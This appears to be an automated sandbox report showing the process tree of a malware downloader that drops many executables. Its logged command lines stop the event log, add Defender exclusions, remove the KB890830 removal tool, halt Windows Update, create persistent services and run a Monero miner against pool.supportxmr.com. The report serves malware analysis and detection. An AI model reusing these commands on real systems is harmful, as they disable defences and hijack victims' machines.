C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Downloaders.zip
1⤵
PID:2120

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:8
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa9523ab58,0x7ffa9523ab68,0x7ffa9523ab78
  2⤵
  PID:4404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1740 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:2
  2⤵
  PID:1124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:8
  2⤵
  PID:4788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2260 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:8
  2⤵
  PID:1592
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:1
  2⤵
  PID:2432
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3048 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:1
  2⤵
  PID:4980
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4296 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:1
  2⤵
  PID:3076
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4500 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:8
  2⤵
  PID:3052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4652 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:8
  2⤵
  PID:1676
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=4152 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:1
  2⤵
  PID:396
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4600 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:1
  2⤵
  PID:4800
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4712 --field-trial-handle=1880,i,15004414400278778782,5782055826212171140,131072 /prefetch:1
  2⤵
  PID:964

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4088

C:\Windows\system32\SearchIndexer.exe
C:\Windows\system32\SearchIndexer.exe /Embedding
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1444
- C:\Windows\system32\SearchProtocolHost.exe
  "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe1_ Global\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon"
  2⤵
  - Modifies data under HKEY_USERS
  PID:3004
- C:\Windows\system32\SearchFilterHost.exe
  "C:\Windows\system32\SearchFilterHost.exe" 0 800 804 812 8192 808 784
  2⤵
  - Modifies data under HKEY_USERS
  PID:2680
- C:\Windows\system32\SearchFilterHost.exe
  "C:\Windows\system32\SearchFilterHost.exe" 0 800 804 812 8192 808 784
  2⤵
  PID:6308
- C:\Windows\system32\SearchFilterHost.exe
  "C:\Windows\system32\SearchFilterHost.exe" 0 800 804 812 8192 808 784
  2⤵
  PID:6760

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3504

C:\Windows\system32\rundll32.exe
"C:\Windows\system32\rundll32.exe" C:\Windows\system32\themecpl.dll,OpenThemeAction C:\Windows\WinSxS\amd64_microsoft-windows-themefile-aero_31bf3856ad364e35_10.0.19041.1_none_2fe4331ee906f14a\aero.theme
1⤵
- Modifies Control Panel
PID:4236

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap6276:80:7zEvent20958
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5776

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap30411:108:7zEvent29
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5880

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap6163:110:7zEvent25981
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5972

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:6080
- C:\Windows\system32\NOTEPAD.EXE
  "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\New Text Document mod.exse
  2⤵
  PID:6140

C:\Users\Admin\Desktop\New Text Document mod.exe
"C:\Users\Admin\Desktop\New Text Document mod.exe"
1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:936
- C:\Users\Admin\Desktop\a\uYtF.exe
  "C:\Users\Admin\Desktop\a\uYtF.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:6484
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:5556
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:5600
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:5408
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    - Suspicious use of AdjustPrivilegeToken
    PID:5680
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "xjuumoinznsp"
    3⤵
    - Launches sc.exe
    PID:5696
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "xjuumoinznsp" binpath= "C:\ProgramData\ajdiewdhnaew\wfbrmcwrltkl.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:5752
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:5780
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "xjuumoinznsp"
    3⤵
    - Launches sc.exe
    PID:5824
- C:\Users\Admin\Desktop\a\serieta.exe
  "C:\Users\Admin\Desktop\a\serieta.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:6840
- - C:\Users\Admin\AppData\Local\Temp\natura.exe
    "C:\Users\Admin\AppData\Local\Temp\natura.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3524
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "HJUWGNAT"
      4⤵
      Launches sc.exe
      PID:6824
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "HJUWGNAT" binpath= "C:\ProgramData\agmxykvocxft\etuamactyjne.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:4440
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:5368
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "HJUWGNAT"
      4⤵
      Launches sc.exe
      PID:4692
- - C:\Users\Admin\AppData\Local\Temp\nautr.exe
    "C:\Users\Admin\AppData\Local\Temp\nautr.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3216
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "OYGYWFTH"
      4⤵
      Launches sc.exe
      PID:7048
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "OYGYWFTH" binpath= "C:\ProgramData\dnbdcucuyzqs\pseaptzkxyms.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:3924
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:6772
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "OYGYWFTH"
      4⤵
      PID:6188
- - C:\Users\Admin\AppData\Local\Temp\Notepad.exe
    "C:\Users\Admin\AppData\Local\Temp\Notepad.exe"
    3⤵
    - Executes dropped EXE
    PID:3900
  - - C:\Users\Admin\AppData\Local\Temp\Notepad.exe
      "C:\Users\Admin\AppData\Local\Temp\Notepad.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1124
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c C:\Users\Admin\activate.bat
        5⤵
        
        PID:7120
      - C:\Windows\system32\taskkill.exe
        
        taskkill /f /im "Notepad.exe"
        6⤵
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:5136
      - C:\Users\Admin\Notepad.exe
        
        "Notepad.exe"
        6⤵
        Executes dropped EXE
        
        PID:5324
        
        C:\Users\Admin\Notepad.exe
        
        "Notepad.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        
        PID:5280
- C:\Users\Admin\Desktop\a\0x3fg.exe
  "C:\Users\Admin\Desktop\a\0x3fg.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:6952
- - C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
    "C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe"
    3⤵
    - Executes dropped EXE
    PID:1544
  - - C:\Users\Admin\AppData\Roaming\1000001000\uYtF.exe
      "C:\Users\Admin\AppData\Roaming\1000001000\uYtF.exe"
      4⤵
      PID:7808
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        
        PID:1936
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        
        PID:5184
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        Power Settings
        
        PID:3080
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        Power Settings
        
        PID:6748
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        
        PID:6028
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "xjuumoinznsp"
        5⤵
        
        PID:468
- C:\Users\Admin\Desktop\a\setup.exe
  "C:\Users\Admin\Desktop\a\setup.exe"
  2⤵
  - Executes dropped EXE
  PID:2924
- - C:\Users\Admin\AppData\Local\Temp\setup-95f1eaa636b0010d\setup.exe
    "C:\Users\Admin\AppData\Local\Temp\setup-95f1eaa636b0010d\setup.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    PID:2444
  - - C:\Windows\system32\winsvc.exe
      "C:\Windows\system32\winsvc.exe" "C:\Users\Admin\AppData\Local\Temp\setup-95f1eaa636b0010d\setup.exe"
      4⤵
      Executes dropped EXE
      PID:1084
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "create" "winsvc" "type=own" "start=auto" "error=ignore" "binPath=\"C:\Windows\system32\winsvc.exe\"" "DisplayName=\"Windows System Service\""
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5928
      - C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" create winsvc type=own start=auto error=ignore binPath=C:\Windows\system32\winsvc.exe "DisplayName=Windows System Service"
        6⤵
        Launches sc.exe
        
        PID:5160
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "failure" "winsvc" "reset=0" "actions=restart/0/restart/0/restart/0"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4344
      - C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" failure winsvc reset=0 actions=restart/0/restart/0/restart/0
        6⤵
        Launches sc.exe
        
        PID:6036
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "description" "winsvc" "\"Windows System Service is the main system supervision service.\""
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2764
      - C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" description winsvc "Windows System Service is the main system supervision service."
        6⤵
        
        PID:2124
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "\"C:\Windows\system32\sc.exe\"" "start" "winsvc"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6804
      - C:\Windows\system32\sc.exe
        
        "C:\Windows\system32\sc.exe" start winsvc
        6⤵
        Launches sc.exe
        
        PID:6364
- C:\Users\Admin\Desktop\a\BuildTotale.exe
  "C:\Users\Admin\Desktop\a\BuildTotale.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:2628
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AZwBuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAaABjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGgAcQBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAYgBiACMAPgA="
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:6112
- - C:\Users\Admin\AppData\Local\Temp\supportoxmr.exe
    "C:\Users\Admin\AppData\Local\Temp\supportoxmr.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:4640
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:5412
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4236
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:5340
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "ZODSAKKJ"
      4⤵
      Launches sc.exe
      PID:6108
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "ZODSAKKJ" binpath= "C:\ProgramData\ytdcogcfuxoe\wsfekkbdzjcc.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:6432
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:3636
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "ZODSAKKJ"
      4⤵
      Launches sc.exe
      PID:4556
- - C:\Users\Admin\AppData\Local\Temp\etc test.exe
    "C:\Users\Admin\AppData\Local\Temp\etc test.exe"
    3⤵
    - Executes dropped EXE
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    PID:3428
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:6568
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:5860
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:5868
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "OBKZWAPS"
      4⤵
      Launches sc.exe
      PID:5840
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "OBKZWAPS" binpath= "C:\ProgramData\rstywrmdprzs\esfowblknspo.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:6016
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:2164
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "OBKZWAPS"
      4⤵
      Launches sc.exe
      PID:6904
- - C:\Users\Admin\AppData\Local\Temp\Notepad.exe
    "C:\Users\Admin\AppData\Local\Temp\Notepad.exe"
    3⤵
    - Executes dropped EXE
    PID:6296
  - - C:\Users\Admin\AppData\Local\Temp\Notepad.exe
      "C:\Users\Admin\AppData\Local\Temp\Notepad.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      PID:6880
- C:\Users\Admin\Desktop\a\taskweaker.exe
  "C:\Users\Admin\Desktop\a\taskweaker.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3628
- - C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
    3⤵
    PID:2444
- C:\Users\Admin\Desktop\a\ama.exe
  "C:\Users\Admin\Desktop\a\ama.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3708
- - C:\Users\Admin\AppData\Local\Temp\6.exe
    "C:\Users\Admin\AppData\Local\Temp\6.exe"
    3⤵
    - Executes dropped EXE
    PID:3220
- - C:\Users\Admin\AppData\Local\Temp\7.exe
    "C:\Users\Admin\AppData\Local\Temp\7.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Checks computer location settings
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - Drops file in Windows directory
    PID:6308
  - - C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
      "C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      PID:4468
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.co/1lLub
    3⤵
    PID:6028
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x120,0x124,0xd4,0x128,0x7ffa84f646f8,0x7ffa84f64708,0x7ffa84f64718
      4⤵
      PID:6032
- C:\Users\Admin\Desktop\a\setup222.exe
  "C:\Users\Admin\Desktop\a\setup222.exe"
  2⤵
  - Executes dropped EXE
  PID:5240
- - C:\Users\Admin\Desktop\a\SetupWizard.exe
    SetupWizard.exe
    3⤵
    - Executes dropped EXE
    PID:3152
  - - C:\Users\Admin\AppData\Local\Temp\SetupWizard-2def38ccf03da3c1\SetupWizard.exe
      "C:\Users\Admin\AppData\Local\Temp\SetupWizard-2def38ccf03da3c1\SetupWizard.exe"
      4⤵
      Executes dropped EXE
      PID:7108
- - C:\Users\Admin\Desktop\a\SetupWizard.exe
    SetupWizard.exe
    3⤵
    PID:6344
- C:\Users\Admin\Desktop\a\FirstZ.exe
  "C:\Users\Admin\Desktop\a\FirstZ.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  PID:6240
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6724
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2740
  - - C:\Windows\system32\wusa.exe
      wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:5896
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5616
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:6456
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop wuauserv
    3⤵
    - Launches sc.exe
    PID:4784
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop bits
    3⤵
    - Launches sc.exe
    PID:3900
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop dosvc
    3⤵
    - Launches sc.exe
    PID:180
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:4472
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:6784
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:5604
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:2232
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "WSNKISKT"
    3⤵
    - Launches sc.exe
    PID:5540
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
    3⤵
    PID:3540
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:5916
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "WSNKISKT"
    3⤵
    - Launches sc.exe
    PID:964
- C:\Users\Admin\Desktop\a\pic1.exe
  "C:\Users\Admin\Desktop\a\pic1.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:6052
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\1.bat" "
    3⤵
    PID:5532
  - - C:\Users\Admin\AppData\Local\Temp\RarSFX0\rolex.exe
      rolex.exe -priverdD
      4⤵
      Checks computer location settings
      Executes dropped EXE
      PID:5236
    - - C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\yondex.exe"
        5⤵
        Drops startup file
        Executes dropped EXE
        Adds Run key to start application
        
        PID:6272
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
        6⤵
        
        PID:7656
      - C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe
        
        "C:\Users\Admin\AppData\Roaming\Sysfiles\Driver.exe" -o pool.supportxmr.com:3333 -u 49P3pcAzUyQGZCctcW2i6KGBfC5noZALZ4wryTdxqn8YRbZJnB4f2ee6F7vGGFwqgQEb5QdAe3oWW72bsbnBcPetADGCrmw -p x -k -v=0 --donate-level=0 -t 4
        6⤵
        
        PID:7752
- C:\Users\Admin\Desktop\a\svchost.exe
  "C:\Users\Admin\Desktop\a\svchost.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:6840
- - C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe
    "C:\Program Files (x86)\Microsoft Jufbhx\Jufrxnb.exe"
    3⤵
    - Executes dropped EXE
    PID:3188
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3188 -s 588
      4⤵
      Program crash
      PID:4996
